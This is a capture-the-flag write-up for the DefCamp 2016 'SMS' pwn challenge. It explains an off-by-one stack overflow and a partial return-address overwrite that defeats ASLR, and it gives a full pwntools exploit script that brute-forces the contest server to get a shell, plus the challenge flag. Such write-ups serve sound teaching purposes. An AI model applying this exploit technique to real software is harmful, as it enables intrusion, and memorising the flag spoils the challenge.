DefCamp CTF Finals 2016: SMS (pwn 200)

Description

nc 45.32.157.65 65022
200.bin

TL;DR

• Overflow the length variable.
• Overflow the return address to the built-in get shell function (Only overflow least two bytes to bypass ASLR).

Exploit

--------------------------------------------
|   Welcome to Defcamp SMS service          |
--------------------------------------------
Enter your name
> AAA
Hi, AAA
SMS our leader
> AAA
SMS delivered

The binary let us input our name and a message. The memory layout looks like:

Stack:
| SMS content (140 bytes) | name (40 bytes) | SMS length (1 byte) |

The vulnerability is that when reading a name of 40 bytes, the correct for loop should be:

for(int i = 0; i < 40; i++)
    ...

instead of

for(int i = 0; i <= 40; i++)
    ...

which causes a one byte overflow, and let us further overflow the return address when reading the SMS content. The target of the return is a built-in get shell function frontdoor. However, this program is PIE enabled, so we don’t know the exact address of frontdoor. We can overcome it by only overriding the least two bytes of the return address. Since the least 12 bits are fixed, we are only guessing 4 bits of the address.

The complete script is as follows.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

from pwn import *
from time import sleep

context.terminal = ['tmux', 'splitw', '-h']

for i in range(256):
    #  r = process('./200.bin')
    #  gdb.attach(r, '''
    #  c
    #  ''')
    r = remote('45.32.157.65', 65022)

    sleep(0.1)
    print r.recv()
    r.sendline('A'*40 + '\xca')
    sleep(0.1)
    print r.recv()
    r.sendline('A'*200 + '\x01\x49')
    try:
        r.sendline('cat flag\x00')
        sleep(0.5)
        print r.recv()
    except:
        print 'fail'

    r.close()

Flag: DCTF{35c60be438186d13fdd2c9db9d3e33b7}